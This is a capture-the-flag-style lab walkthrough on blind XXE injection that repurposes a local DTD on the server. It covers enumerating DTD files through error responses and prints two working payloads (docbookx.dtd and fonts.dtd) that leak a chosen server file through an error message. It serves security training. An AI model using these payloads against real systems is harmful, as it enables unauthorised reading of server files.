Exploiting XXE to retrieve data by repurposing a local DTD
Exploitation
the lab has a "check stock" feature that parses XML input
send to repeater
it does not display the result, which indicates that this is a blind XXE injection.
also the out-of-band techniques do not work.
To exploit blind XXE injection, we could leverage a local DTD.
When to use a local DTD
We can declare and reference Entities but we can't exfiltrate data in-band
Egress filtering prevents out-of-band calls to our server
A local DTD is a DTD file that already exists on the target server. we leverage this DTD file by causing an error to exfiltrate data.
Enumerating DTD files
locating existing files returns an error
locating non existing files returns no such file or directory
so the variance in application response allows us to enumerate existent vs non-existent DTD files.
so let's send the request to intruder and check againt a list of common DTDs
here is a link for an awesome list by GoSecure
in this resource you can find xxe payloads for each DTD
let's use the docbookx.dtd xxe payload
<!DOCTYPE message [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamsa '
<!ENTITY % file SYSTEM "file:///YOUR_FILE">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>">
%eval;
%error;
'>
%local_dtd;
]>
<message></message>
also we can use the fonts.dtd xxe payload
<!DOCTYPE message [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd">
<!ENTITY % constant 'aaa)>
<!ENTITY % file SYSTEM "file:///YOUR_FILE">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>">
%eval;
%error;
<!ELEMENT aa (bb'>
%local_dtd;
]>
<message></message>
and we have solved the lab
hope you found this walkthrough easy to understand and follow
Greeting From Sayonara
Last updated
Was this helpful?